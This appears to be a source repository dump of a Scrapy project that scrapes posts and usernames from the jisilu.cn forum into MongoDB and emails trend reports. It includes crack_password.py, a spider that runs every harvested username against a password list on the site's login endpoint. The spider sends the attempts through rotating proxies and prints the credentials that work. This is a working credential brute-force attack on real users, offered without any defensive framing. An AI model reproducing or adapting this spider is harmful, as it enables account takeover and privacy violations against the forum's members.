├── jsl ├── __init__.py ├── spiders │ ├── __init__.py │ ├── aes_encode.py │ ├── crack_password.py │ ├── relationship.py │ ├── questions_loop.py │ ├── jisilu_user_content.py │ ├── weekly_content.py │ ├── allcontent.py │ └── questions.py ├── items.py ├── middlewares.py ├── settings.py └── pipelines.py ├── daily_trend.bat ├── jsl_daily_content.bat ├── jsl_comphrehensive_content.bat ├── .gitattributes ├── .gitignore ├── single_user.py ├── question.py ├── comprehensive_content.py ├── scrapy.cfg ├── daily_content.py ├── weekly_content.py ├── README.md ├── run.py ├── daily_send.py ├── mongo_syncup.py ├── guess_first_day_price.py ├── collect_username.py ├── trend.py ├── guess_first_day_price_syncup.py ├── crack_jsl.py └── 数据迁移.ipynb /jsl/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /daily_trend.bat: -------------------------------------------------------------------------------- 1 | cd C:\Users\Administrator\Documents\code\jsl 2 | python daily_send.py -------------------------------------------------------------------------------- /jsl_daily_content.bat: -------------------------------------------------------------------------------- 1 | cd C:\Users\Administrator\Documents\code\jsl 2 | python daily_content.py -------------------------------------------------------------------------------- /jsl_comphrehensive_content.bat: -------------------------------------------------------------------------------- 1 | cd C:\Users\Administrator\Documents\code\jsl 2 | python comprehensive_content.py -------------------------------------------------------------------------------- /.gitattributes: -------------------------------------------------------------------------------- 1 | *.js linguist-language=python 2 | *.css linguist-language=python 3 | *.ipynb linguist-language=python 4 | *.html linguist-language=python -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | *.pyc 2 | .idea 3 | config.py 4 | *.log 5 | settings.py 6 | data.cfg 7 | config_path/config.json 8 | config_.py 9 | creator.txt 10 | userinfo.py 11 | .ipynb_checkpoints/ -------------------------------------------------------------------------------- /single_user.py: -------------------------------------------------------------------------------- 1 | from scrapy import cmdline 2 | import datetime 3 | # 获取指定日期内的所有帖子 4 | 5 | # cmd = 'scrapy crawl allcontent' 6 | cmd = 'scrapy crawl single_user' 7 | cmdline.execute(cmd.split()) -------------------------------------------------------------------------------- /jsl/spiders/__init__.py: -------------------------------------------------------------------------------- 1 | # This package will contain the spiders of your Scrapy project 2 | # 3 | # Please refer to the documentation for information on how to create and manage 4 | # your spiders. 
5 | -------------------------------------------------------------------------------- /question.py: -------------------------------------------------------------------------------- 1 | # -*-coding=utf-8-*- 2 | 3 | # @Time : 2018/12/27 17:04 4 | # @File : question.py 5 | 6 | from scrapy import cmdline 7 | 8 | cmd = 'scrapy crawl questions -s LOG_FILE=log/question.log' 9 | # cmd = 'scrapy crawl questions' 10 | cmdline.execute(cmd.split()) -------------------------------------------------------------------------------- /comprehensive_content.py: -------------------------------------------------------------------------------- 1 | from scrapy import cmdline 2 | import datetime 3 | # 获取指定日期内的所有帖子 4 | 5 | # cmd = 'scrapy crawl allcontent' 6 | cmd = 'scrapy crawl allcontent -s LOG_FILE=log/allcontent-{}.log -a daily=no'.format(datetime.datetime.now().strftime('%Y-%m-%d')) 7 | cmdline.execute(cmd.split()) -------------------------------------------------------------------------------- /scrapy.cfg: -------------------------------------------------------------------------------- 1 | # Automatically created by: scrapy startproject 2 | # 3 | # For more information about the [deploy] section see: 4 | # https://scrapyd.readthedocs.org/en/latest/deploy.html 5 | 6 | [settings] 7 | default = jsl.settings 8 | 9 | [deploy] 10 | #url = http://localhost:6800/ 11 | project = jsl 12 | -------------------------------------------------------------------------------- /daily_content.py: -------------------------------------------------------------------------------- 1 | # -*-coding=utf-8-*- 2 | 3 | # @Time : 2018/12/27 16:58 4 | # @File : daily_content.py 5 | from scrapy import cmdline 6 | import datetime 7 | # 获取指定日期内的所有帖子 8 | 9 | cmd = 'scrapy crawl allcontent -s LOG_FILE=log/allcontent-{}.log -a daily=yes'.format(datetime.datetime.now().strftime('%Y-%m-%d')) 10 | cmdline.execute(cmd.split()) 11 | -------------------------------------------------------------------------------- /weekly_content.py: -------------------------------------------------------------------------------- 1 | # -*-coding=utf-8-*- 2 | 3 | # @Time : 2018/12/27 16:58 4 | # @File : daily_content.py 5 | from scrapy import cmdline 6 | import datetime 7 | # 获取指定日期内的所有帖子 8 | 9 | # cmd = 'scrapy crawl allcontent -s LOG_FILE=log/allcontent-{}.log -a daily=yes'.format(datetime.datetime.now().strftime('%Y-%m-%d')) 10 | cmd = 'scrapy crawl week_content' 11 | cmdline.execute(cmd.split()) -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # jsl 2 | 抓取集思录指定的用户的帖子,存档到mongo 3 | 4 | #### 2020-11-27更新 加入登录JS加密与解密 5 | [http://30daydo.com/article/44109](http://30daydo.com/article/44109) 6 | 7 |
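The login encryption added in that update lives in `jsl/spiders/aes_encode.py`: it loads `encode_jsl.js` with `execjs` and calls the site's `jslencode(text, key)` routine, and the spiders feed the encrypted user name and password into the login form request. A minimal usage sketch, assuming `execjs` plus a JavaScript runtime is installed; the credential strings below are placeholders, not values from this repo:

```python
from jsl.spiders.aes_encode import decoder

# Encrypt plaintext credentials the same way the spiders do before posting
# them to https://www.jisilu.cn/account/ajax/login_process/
enc_user = decoder('your_user_name')      # placeholder user name
enc_password = decoder('your_password')   # placeholder password
print(enc_user, enc_password)
```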
8 | 使用方法: 9 | 安装scrapy + pymongo, 安装mongo服务器 10 | 11 | 安装完成后运行 python run.py 12 | 需要抓取指定的用户名:比如 毛之川 13 | 等待程序返回用户的id,然后把id 复制到spider/jisilu.py 文件中的 self.uid = '8132', 替换这个值 14 | 修改pipeline.py文件中这一行 15 | self.user = u'毛之川' # 修改为指定的用户名 如 毛之川 16 | 17 | #### 新增爬取全站数据 18 | 19 | #### guess_first_day_price_syncup.py 估算可转债上市价格 20 | 21 | ### 关注公众号: 可转债量化分析 22 | ![可转债量化分析](http://xximg.30daydo.com/picgo/kzz.jpg) -------------------------------------------------------------------------------- /jsl/spiders/aes_encode.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | # @Time : 2020/11/27 22:00 3 | # @File : aes_encode.py 4 | # @Author : Rocky C@www.30daydo.com 5 | 6 | import execjs 7 | import os 8 | key = '397151C04723421F' 9 | filename = 'encode_jsl.js' 10 | path = os.path.dirname(os.path.abspath(__file__)) 11 | full_path = os.path.join(path,filename) 12 | 13 | def decoder(text): 14 | with open(full_path, 'r', encoding='utf8') as f: 15 | source = f.read() 16 | 17 | ctx = execjs.compile(source) 18 | return ctx.call('jslencode', text, key) 19 | 20 | 21 | if __name__ == '__main__': 22 | print(decoder('123456')) -------------------------------------------------------------------------------- /run.py: -------------------------------------------------------------------------------- 1 | # -*-coding=utf-8-*- 2 | 3 | __author__ = 'Rocky' 4 | ''' 5 | http://30daydo.com 6 | Email: weigesysu@qq.com 7 | ''' 8 | from scrapy import cmdline 9 | import requests 10 | import re 11 | 12 | def search_id(): 13 | name = input(u'请输入你需要抓取的用户名: ') 14 | url = 'https://www.jisilu.cn/people/{}'.format(str(name)) 15 | # url ='https://www.jisilu.cn/people/持有封基' 16 | r = requests.get(url) 17 | user_id = re.findall('var PEOPLE_USER_ID = \'(\d+)\';' , r.text) 18 | print(user_id[0]) 19 | 20 | def main(): 21 | # search_id() 22 | # exit() 23 | 24 | cmd = 'scrapy crawl allcontent' 25 | 26 | 27 | 28 | if __name__ == '__main__': 29 | main() -------------------------------------------------------------------------------- /jsl/items.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | # Define here the models for your scraped items 4 | # 5 | # See documentation in: 6 | # http://doc.scrapy.org/en/latest/topics/items.html 7 | 8 | import scrapy 9 | 10 | 11 | class JslItem(scrapy.Item): 12 | # define the fields for your item here like: 13 | # name = scrapy.Field() 14 | title = scrapy.Field() 15 | creator = scrapy.Field() 16 | content = scrapy.Field() 17 | content_html = scrapy.Field() 18 | url = scrapy.Field() 19 | html = scrapy.Field() 20 | question_id = scrapy.Field() 21 | createTime = scrapy.Field() 22 | resp_no = scrapy.Field() 23 | resp = scrapy.Field() # list 24 | crawlTime = scrapy.Field() 25 | # type_ = scrapy.Field() 26 | last_resp_date = scrapy.Field() 27 | only_add = scrapy.Field() 28 | 29 | class Relationship(scrapy.Item): 30 | user_id = scrapy.Field() 31 | flag = scrapy.Field() 32 | user = scrapy.Field() 33 | prestige = scrapy.Field() # 威望 34 | approve = scrapy.Field() # 赞同 35 | follows_count = scrapy.Field() 36 | fans_count = scrapy.Field() 37 | follows_list = scrapy.Field() 38 | fans_list = scrapy.Field() 39 | crawltime = scrapy.Field() 40 | 41 | 42 | -------------------------------------------------------------------------------- /daily_send.py: -------------------------------------------------------------------------------- 1 | # 每天的热帖 2 | 3 | import datetime 4 | import pymongo 5 | from settings 
import send_from_aliyun,DBSelector 6 | 7 | last_time = -10 # 多少周之前 8 | 9 | 10 | db=DBSelector().mongo() 11 | MAX = 1000 12 | current = datetime.datetime.now() 13 | 14 | last_day = current + datetime.timedelta(hours=-32) # 脚本设置在早上8点运行 15 | current_str = current.strftime("%Y-%m-%d") 16 | 17 | 18 | def main(): 19 | result = db['db_parker']['jsl'].find({},{'html':0}).sort('_id',pymongo.DESCENDING).limit(MAX) 20 | filter_result = [] 21 | for i in result: 22 | createTime = i['createTime'] 23 | createTime = datetime.datetime.strptime(createTime,'%Y-%m-%d %H:%M') 24 | if createTime >= last_day : 25 | title = i['title'] 26 | creator = i['creator'] 27 | resp_count = len(i['resp']) 28 | url = i['url'] 29 | d = {'title':title,'url':url,'resp_count':resp_count} 30 | filter_result.append(d) 31 | 32 | hot_list = list(sorted(filter_result,key=lambda x:x['resp_count'],reverse=True))[:10] 33 | title,html = format_mail(hot_list) 34 | try: 35 | send_from_aliyun(title,html,types='html') 36 | 37 | except Exception as e: 38 | # logger.error(e) 39 | print(e) 40 | 41 | 42 | def format_mail(hot_list): 43 | title='{} jsl TOP10'.format(current_str) 44 | content = '' 45 | for hl in hot_list: 46 | content+='
<a href="{}">{} 回复:{}</a><br>
'.format(hl['url'],hl['title'],hl['resp_count']) 47 | 48 | return title,content 49 | 50 | 51 | 52 | if __name__ == '__main__': 53 | main() -------------------------------------------------------------------------------- /mongo_syncup.py: -------------------------------------------------------------------------------- 1 | # 同步两个mongodb的数据 2 | import pymongo 3 | from settings import DBSelector 4 | from loguru import logger 5 | 6 | logger.add('syncup.log') 7 | db=DBSelector() 8 | client = db.mongo('qq') 9 | remote=client['db_parker']['jsl'] 10 | local=pymongo.MongoClient()['db_parker']['jsl'] 11 | remote_data = remote.find() 12 | 13 | # 更新本地数据 14 | def update(item,question_id,update=False): 15 | del item['_id'] 16 | 17 | if update: 18 | local.update_one({'question_id':question_id},{'$set':{'resp':item['resp'],'resp_no':item['resp_no']}}) 19 | else: 20 | local.insert_one(item) 21 | remote.delete_one({'question_id': question_id}) 22 | 23 | def remove(item): 24 | remote.delete_one({'_id': item['_id']}) 25 | 26 | 27 | 28 | for item in remote_data: 29 | question_id = item['question_id'] 30 | local_find_doc = local.find_one({'question_id':question_id}) 31 | if local_find_doc: 32 | resp_no = item['resp_no'] 33 | 34 | if resp_no<=local_find_doc['resp_no']: 35 | try: 36 | remove(item) 37 | except Exception as e: 38 | logger.error(e) 39 | else: 40 | logger.info(f'删除相同{question_id}') 41 | 42 | else: 43 | try: 44 | update(item,question_id,True) 45 | except Exception as e: 46 | logger.error(e) 47 | 48 | else: 49 | logger.info(f'更新本地{question_id}') 50 | else: 51 | try: 52 | update(item,question_id,False) 53 | except Exception as e: 54 | logger.error(e) 55 | else: 56 | logger.info(f'删除不存在,备份后的{question_id}') 57 | -------------------------------------------------------------------------------- /guess_first_day_price.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | # website: http://30daydo.com 3 | # @Time : 2019/7/10 22:46 4 | # @File : guess_first_day_price.py 5 | 6 | # 猜测第一天上市价格 7 | # 使用twsisted失败 8 | 9 | from twisted.web.client import getPage 10 | from twisted.internet import reactor 11 | from twisted.internet import defer 12 | from scrapy.selector import Selector 13 | import numpy as np 14 | 15 | result_list = [] 16 | 17 | def get_response_callback(content): 18 | # print(content) 19 | 20 | text = str(content,encoding='utf-8') 21 | # print(text) 22 | response = Selector(text=text) 23 | nodes = response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div') 24 | for node in nodes: 25 | reply = node.xpath('.//div[@class="markitup-box"]/text()').extract_first() 26 | if reply: 27 | reply = reply.strip() 28 | # print(reply) 29 | result_list.append(float(reply)) 30 | 31 | print('done') 32 | 33 | 34 | @defer.inlineCallbacks 35 | def task(url): 36 | d= getPage(url.encode('utf-8')) 37 | d.addCallback(get_response_callback) 38 | yield d 39 | 40 | def get_result(): 41 | # print(result_list) 42 | # print(result_list) 43 | result = np.array(result_list) 44 | print(result.mean()) 45 | 46 | urls='https://www.jisilu.cn/question/id-321075__sort_key-__sort-DESC__uid-__page-{}' 47 | d_list=[] 48 | page = 4 49 | for i in range(1,page+1): 50 | # print(urls.format(i)) 51 | t = task(urls.format(i)) 52 | # t = task(urls) 53 | d_list.append(t) 54 | d = defer.DeferredList(d_list) 55 | # d.addBoth(lambda _:reactor.callLater(0,get_result())) 56 | d.addBoth(lambda _:reactor.stop()) 57 | reactor.run() 58 | 59 | 
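# Note: as the script stands, get_result() is never called. The active addBoth
# hook only stops the reactor, and the commented-out variant hands
# reactor.callLater the return value of get_result() (None) instead of the
# function itself. A minimal sketch, reusing only the d_list and get_result
# defined above, that prints the average price before shutting the reactor down:
#
#     d = defer.DeferredList(d_list)
#
#     def report_and_stop(_):
#         get_result()   # prints the mean of result_list
#         reactor.stop()
#
#     d.addBoth(report_and_stop)
#     reactor.run()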
-------------------------------------------------------------------------------- /collect_username.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | # website: http://30daydo.com 3 | # @Time : 2020/9/5 14:25 4 | # @File : collect_username.py 5 | import pymongo 6 | import codecs 7 | from loguru import logger 8 | from jsl import config 9 | 10 | connect_uri = f'mongodb://{config.user}:{config.password}@{config.mongodb_host}:{config.mongodb_port}' 11 | client = pymongo.MongoClient(connect_uri) 12 | 13 | doc = client['db_parker'][config.doc_name] 14 | 15 | def collect_creator(): 16 | creators = doc.find({},{'creator':1}) 17 | user_set = set() 18 | count = 0 19 | for create in creators.batch_size(100): 20 | print(count) 21 | count+=1 22 | name = create.get('creator') 23 | # print(name) 24 | if name is not None and isinstance(name,str): 25 | user_set.add(name) 26 | user_list = list(user_set) 27 | user_str = '\n'.join(user_list) 28 | with codecs.open('creator.txt','w',encoding='utf8') as f: 29 | f.write(user_str) 30 | 31 | 32 | def get_user(filename): 33 | user_list = None 34 | with codecs.open(filename,'r',encoding='utf8') as f: 35 | user_list = f.readlines() 36 | user_list=set(map(lambda x:x.strip(),user_list)) 37 | return user_list 38 | 39 | def repler(): 40 | resps = doc.find({},{'resp':1,'_id':0}) 41 | user_set = set() 42 | count = 0 43 | creartor_set = get_user('creator.txt') 44 | 45 | for resp in resps.batch_size(500): 46 | resp_list = resp.get('resp') 47 | if resp_list: 48 | for resp_ in resp_list: 49 | name=list(resp_.keys())[0] 50 | if name not in creartor_set and name not in user_set: 51 | count += 1 52 | print(count) 53 | print(name) 54 | user_set.add(name) 55 | user_list = list(user_set) 56 | user_str = '\n'.join(user_list) 57 | with codecs.open('reply.txt','w',encoding='utf8') as f: 58 | f.write(user_str) 59 | 60 | repler() 61 | logger.info('Done') 62 | 63 | 64 | -------------------------------------------------------------------------------- /trend.py: -------------------------------------------------------------------------------- 1 | # -*-coding=utf-8-*- 2 | 3 | # @Time : 2020/1/1 0:08 4 | # @File : trend.py 5 | # 统计发帖趋势 6 | import datetime 7 | import numpy as np 8 | import pandas as pd 9 | from settings import send_from_aliyun, llogger,DBSelector 10 | 11 | last_time = -10 # 多少周之前 12 | 13 | logger = llogger('log/trend_.log') 14 | db = DBSelector().mongo() 15 | doc = db['db_parker']['jsl'] 16 | total_list = [] 17 | date = datetime.datetime.now() + datetime.timedelta(days=-365) # 一年内的数据 18 | 19 | 20 | def main(send_mail=True): 21 | for item in doc.find({'last_resp_date': {'$gt': date}}, {'html': 0, 'resp': 0, 'content': 0}): 22 | del item['_id'] 23 | total_list.append(item) 24 | 25 | df = pd.DataFrame(total_list) 26 | df['createTime'] = pd.to_datetime(df['createTime']) 27 | df = df.set_index('createTime', drop=True) 28 | new_df = df.resample('W').count() 29 | show_data = new_df[['creator']].iloc[:last_time:-1] 30 | # print(show_data) 31 | # 最大值与 32 | max_index = new_df['creator'].idxmax().to_pydatetime().strftime('%Y-%m-%d') 33 | max_v = new_df['creator'].max() 34 | current = datetime.datetime.now().strftime('%Y-%m-%d') 35 | title = f'jsl一周发帖数量分析 {current}' 36 | percentage = np.round( 37 | (show_data['creator'].values[:-1] - show_data['creator'].values[1:]) / show_data['creator'].values[1:] * 100, 0) 38 | content = '| 日期 | 贴数 | 环比 |\n' 39 | # print(percentage) 40 | percentage = np.append(percentage, np.nan) 41 | 
start_index = 0 42 | for index, item in show_data.iterrows(): 43 | # print(index,item['creator']) 44 | py_date = index.to_pydatetime().strftime('%Y-%m-%d') 45 | count = item['creator'] 46 | content += f'| {py_date} | {count} | {percentage[start_index]}% |\n' 47 | start_index += 1 48 | content += f'最大值发生在 {max_index},贴数为 {max_v}\n' 49 | logger.info(title) 50 | logger.info(content) 51 | if send_mail: 52 | try: 53 | send_from_aliyun(title, content) 54 | except Exception as e: 55 | logger.error(e) 56 | 57 | 58 | def process_data(): 59 | ''' 60 | 清除一些无用字段的 61 | :return: 62 | ''' 63 | # for item in doc.find({'createTime': {"$regex": "^发"}}, {'_id': 1,'createTime':1}): 64 | for item in doc.find({'crawlTime': None}, {'_id': 1}): 65 | # print(item) 66 | doc.delete_one({'_id': item['_id']}) 67 | print(item) 68 | 69 | if __name__ == '__main__': 70 | main(send_mail=True) 71 | # process_data() 72 | -------------------------------------------------------------------------------- /jsl/middlewares.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | # Define here the models for your spider middleware 4 | # 5 | # See documentation in: 6 | # http://doc.scrapy.org/en/latest/topics/spider-middleware.html 7 | import time 8 | 9 | import requests 10 | from scrapy import signals 11 | from jsl.config import proxy_ip 12 | 13 | class JslSpiderMiddleware(object): 14 | # Not all methods need to be defined. If a method is not defined, 15 | # scrapy acts as if the spider middleware does not modify the 16 | # passed objects. 17 | 18 | @classmethod 19 | def from_crawler(cls, crawler): 20 | # This method is used by Scrapy to create your spiders. 21 | s = cls() 22 | crawler.signals.connect(s.spider_opened, signal=signals.spider_opened) 23 | return s 24 | 25 | def process_spider_input(self, response, spider): 26 | # Called for each response that goes through the spider 27 | # middleware and into the spider. 28 | 29 | # Should return None or raise an exception. 30 | return None 31 | 32 | def process_spider_output(self, response, result, spider): 33 | # Called with the results returned from the Spider, after 34 | # it has processed the response. 35 | 36 | # Must return an iterable of Request, dict or Item objects. 37 | for i in result: 38 | yield i 39 | 40 | def process_spider_exception(self, response, exception, spider): 41 | # Called when a spider or process_spider_input() method 42 | # (from other spider middleware) raises an exception. 43 | 44 | # Should return either None or an iterable of Response, dict 45 | # or Item objects. 46 | pass 47 | 48 | def process_start_requests(self, start_requests, spider): 49 | # Called with the start requests of the spider, and works 50 | # similarly to the process_spider_output() method, except 51 | # that it doesn’t have a response associated. 52 | 53 | # Must return only requests (not items). 
54 | for r in start_requests: 55 | yield r 56 | 57 | def spider_opened(self, spider): 58 | spider.logger.info('Spider opened: %s' % spider.name) 59 | 60 | class MyCustomDownloaderMiddleware(object): 61 | def __init__(self): 62 | self.proxyurl = 'http://{}:8101/dynamicIp/common/getDynamicIp.do'.format(proxy_ip) 63 | 64 | def process_request(self, request, spider): 65 | proxyServer = self.get_proxy() 66 | print('使用了代理') 67 | print(proxyServer) 68 | request.meta["proxy"] = proxyServer 69 | 70 | def get_proxy(self, retry=50): 71 | for i in range(retry): 72 | try: 73 | r = requests.get(self.proxyurl, timeout=10) 74 | except Exception as e: 75 | print(e) 76 | print('Failed to get proxy ip, retry ' + str(i)) 77 | time.sleep(1) 78 | else: 79 | js = r.json() 80 | proxyServer = 'https://{0}:{1}'.format(js.get('ip'), js.get('port')) 81 | return proxyServer 82 | 83 | return None 84 | -------------------------------------------------------------------------------- /jsl/spiders/crack_password.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | # website: http://30daydo.com 3 | # @Time : 2020/9/5 14:03 4 | # @File : crack_password.py 5 | 6 | # 登录破解 7 | import json 8 | 9 | import pymongo 10 | from scrapy import Spider 11 | import codecs 12 | from scrapy import FormRequest, Request 13 | from jsl import config 14 | 15 | class CrackSpider(Spider): 16 | name = 'crack' 17 | custom_settings = {'COOKIES_ENABLED': False, 18 | 'DOWNLOADER_MIDDLEWARES': {'jsl.middlewares.MyCustomDownloaderMiddleware': 543}, 19 | 'ITEM_PIPELINES': {'jsl.pipelines.JslPipeline': None}, 20 | 'CONCURRENT_REQUESTS':1 21 | } 22 | 23 | def __init__(self, *args,**kwargs): 24 | super(CrackSpider, self).__init__(*args,**kwargs) 25 | self.doc = pymongo.MongoClient(host=config.mongodb_host,port=config.mongodb_port) 26 | 27 | filename = 'creator.txt' 28 | with codecs.open(filename, 'r', encoding='utf8') as f: 29 | conent = f.readlines() 30 | self.content = list(map(lambda x: x.strip(), conent)) 31 | 32 | self.url = 'https://www.jisilu.cn/account/ajax/login_process/' 33 | self.data = { 34 | 'return_url': 'https://www.jisilu.cn/', 35 | 'user_name': '', 36 | 'password': '', 37 | 'net_auto_login': '1', 38 | '_post_type': 'ajax', 39 | } 40 | self.headers = { 41 | 'Host': 'www.jisilu.cn', 'Connection': 'keep-alive', 'Pragma': 'no-cache', 42 | 'Cache-Control': 'no-cache', 'Accept': 'application/json,text/javascript,*/*;q=0.01', 43 | 'Origin': 'https://www.jisilu.cn', 'X-Requested-With': 'XMLHttpRequest', 44 | 'User-Agent': 'Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/67.0.3396.99Safari/537.36', 45 | 'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8', 46 | 'Referer': 'https://www.jisilu.cn/login/', 47 | 'Accept-Encoding': 'gzip,deflate,br', 48 | 'Accept-Language': 'zh,en;q=0.9,en-US;q=0.8' 49 | } 50 | with open('password.txt', 'r') as f: 51 | password_list = f.readlines() 52 | self.password_list = list(map(lambda x: x.strip(), password_list)) 53 | 54 | def start_requests(self): 55 | 56 | yield Request( 57 | url='https://www.jisilu.cn', 58 | headers=self.headers, 59 | callback=self.parse_user, 60 | cookies=None, 61 | ) 62 | 63 | def parse_user(self, response): 64 | user = self.content.pop() 65 | while user: 66 | for password in self.password_list: 67 | data = self.data.copy() 68 | data['user_name'] = user 69 | data['password'] = password 70 | yield FormRequest( 71 | url=self.url, 72 | headers=self.headers, 73 | formdata=data, 74 | 
callback=self.parse_data, 75 | dont_filter=True, 76 | cookies=None, 77 | meta={'username':user,'password':password} 78 | ) 79 | 80 | def parse_data(self, response): 81 | print(response.text) 82 | js_data = json.loads(response.text) 83 | errno = js_data.get('errno') 84 | if errno==0: 85 | print('*********') 86 | print('user==>',response.meta['username']) 87 | print('password==>',response.meta['password']) -------------------------------------------------------------------------------- /guess_first_day_price_syncup.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | # website: http://30daydo.com 3 | # @Time : 2019/10/20 19:41 4 | # @File : guess_first_day_price_syncup.py 5 | 6 | # 同步获取 7 | import sys 8 | import time 9 | from selenium import webdriver 10 | from scrapy.selector import Selector 11 | from jsl import config 12 | import pymongo 13 | 14 | 15 | 16 | headers = {'User-Agent': 'FireFox Molliza Chrome'} 17 | path = r'D:\OneDrive\Python\selenium\chromedriver.exe' 18 | option = webdriver.ChromeOptions() 19 | option.add_argument( 20 | '--user-agent=Mozilla/5.0 (Windows NT 9.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36') 21 | option.add_argument('--headless') 22 | driver = webdriver.Chrome(executable_path=path, chrome_options=option) 23 | driver.implicitly_wait(10) 24 | 25 | 26 | def login(): 27 | url = 'https://www.jisilu.cn/login/' 28 | driver.get(url) 29 | input_name = driver.find_element_by_xpath('//input[@id="aw-login-user-name"]') 30 | input_name.send_keys(config.jsl_user) 31 | password = driver.find_element_by_xpath('//input[@id="aw-login-user-password"]') 32 | password.send_keys(config.jsl_password) 33 | time.sleep(0.5) 34 | submit = driver.find_element_by_xpath('//a[@id="login_submit"]') 35 | submit.click() 36 | time.sleep(5) 37 | 38 | 39 | def predict(url,name): 40 | 41 | driver.get(url) 42 | current_page = 1 43 | sum = 0 44 | price_list = [] 45 | while 1: 46 | 47 | try: 48 | 49 | price = parse(driver.page_source) 50 | if price: 51 | price_list.extend(price) 52 | 53 | next_btn = driver.find_element_by_xpath('//div[@class="pagination pull-right"]//a[contains(text(),">")]') 54 | 55 | except Exception as e: 56 | print(e) 57 | break 58 | else: 59 | 60 | current_page += 1 61 | next_btn.click() 62 | # 改为去掉最大和最小的值 63 | max_v=max(price_list) 64 | min_v=min(price_list) 65 | # print(price_list) 66 | price_list.remove(max_v) 67 | price_list.remove(min_v) 68 | # print(price_list) 69 | # price_np = np.array(price_list) 70 | for i in price_list: 71 | sum+=i 72 | 73 | avg = round( sum/len(price_list),3) 74 | print(f'avg price {avg}') 75 | client = pymongo.MongoClient(config.mongodb_host, config.mongodb_port) 76 | doc = client['db_stock']['kzz_price_predict'] 77 | doc.insert_one({'name':name,'predict_price':avg}) 78 | driver.close() 79 | 80 | 81 | def parse(text): 82 | response = Selector(text=text) 83 | nodes = response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]') 84 | result_list = [] 85 | for node in nodes: 86 | comment = node.xpath( 87 | './/div[@class="pull-left aw-dynamic-topic-content"]//div[@class="markitup-box"]/text()').extract_first() 88 | if comment: 89 | comment = comment.strip() 90 | try: 91 | comment = float(comment) 92 | 93 | except Exception as e: 94 | continue 95 | else: 96 | result_list.append(comment) 97 | else: 98 | continue 99 | return result_list 100 | 101 | 102 | def main(url,name): 103 | login() 104 | predict(url,name) 105 | 106 | if 
__name__ == '__main__': 107 | if len(sys.argv)!=3: 108 | print('python guess_first_price_syncup url name\n') 109 | else: 110 | url=sys.argv[1] 111 | name =sys.argv[2] 112 | main(url,name) 113 | -------------------------------------------------------------------------------- /jsl/settings.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | # Scrapy settings for jsl project 4 | # 5 | # For simplicity, this file contains only settings considered important or 6 | # commonly used. You can find more settings consulting the documentation: 7 | # 8 | # http://doc.scrapy.org/en/latest/topics/settings.html 9 | # http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html 10 | # http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html 11 | 12 | BOT_NAME = 'jsl' 13 | 14 | SPIDER_MODULES = ['jsl.spiders'] 15 | NEWSPIDER_MODULE = 'jsl.spiders' 16 | 17 | 18 | # Crawl responsibly by identifying yourself (and your website) on the user-agent 19 | #USER_AGENT = 'jsl (+http://www.yourdomain.com)' 20 | 21 | # Obey robots.txt rules 22 | ROBOTSTXT_OBEY = False 23 | 24 | # Configure maximum concurrent requests performed by Scrapy (default: 16) 25 | 26 | #CONCURRENT_REQUESTS = 32 27 | # LOG_LEVEL='INFO' 28 | CONCURRENT_REQUESTS = 2 29 | LOG_LEVEL='INFO' 30 | DOWNLOAD_DELAY = 1 31 | # REDIRECT_ENABLED = False 32 | # Configure a delay for requests for the same website (default: 0) 33 | # See http://scrapy.readthedocs.org/en/latest/topics/settings.html#download-delay 34 | # See also autothrottle settings and docs 35 | # DOWNLOAD_DELAY = 1 36 | # The download delay setting will honor only one of: 37 | #CONCURRENT_REQUESTS_PER_DOMAIN = 16 38 | #CONCURRENT_REQUESTS_PER_IP = 16 39 | 40 | # Disable cookies (enabled by default) 41 | COOKIES_ENABLED = True 42 | 43 | # Disable Telnet Console (enabled by default) 44 | #TELNETCONSOLE_ENABLED = False 45 | 46 | # Override the default request headers: 47 | #DEFAULT_REQUEST_HEADERS = { 48 | # 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 49 | # 'Accept-Language': 'en', 50 | #} 51 | 52 | # Enable or disable spider middlewares 53 | # See http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html 54 | #SPIDER_MIDDLEWARES = { 55 | # 'jsl.middlewares.JslSpiderMiddleware': 543, 56 | #} 57 | 58 | # Enable or disable downloader middlewares 59 | # See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html 60 | # DOWNLOADER_MIDDLEWARES = { 61 | # 'jsl.middlewares.MyCustomDownloaderMiddleware': 543, 62 | # } 63 | 64 | # Enable or disable extensions 65 | # See http://scrapy.readthedocs.org/en/latest/topics/extensions.html 66 | #EXTENSIONS = { 67 | # 'scrapy.extensions.telnet.TelnetConsole': None, 68 | #} 69 | 70 | # Configure item pipelines 71 | # See http://scrapy.readthedocs.org/en/latest/topics/item-pipeline.html 72 | ITEM_PIPELINES = { 73 | # 'jsl.pipelines.ElasticPipeline': 300, 74 | 'jsl.pipelines.JslPipeline':300, 75 | # 'scrapyelasticsearch.scrapyelasticsearch.ElasticSearchPipeline':200, 76 | } 77 | 78 | # Enable and configure the AutoThrottle extension (disabled by default) 79 | # See http://doc.scrapy.org/en/latest/topics/autothrottle.html 80 | #AUTOTHROTTLE_ENABLED = True 81 | # The initial download delay 82 | #AUTOTHROTTLE_START_DELAY = 5 83 | # The maximum download delay to be set in case of high latencies 84 | #AUTOTHROTTLE_MAX_DELAY = 60 85 | # The average number of requests Scrapy should be sending in parallel to 86 | # 
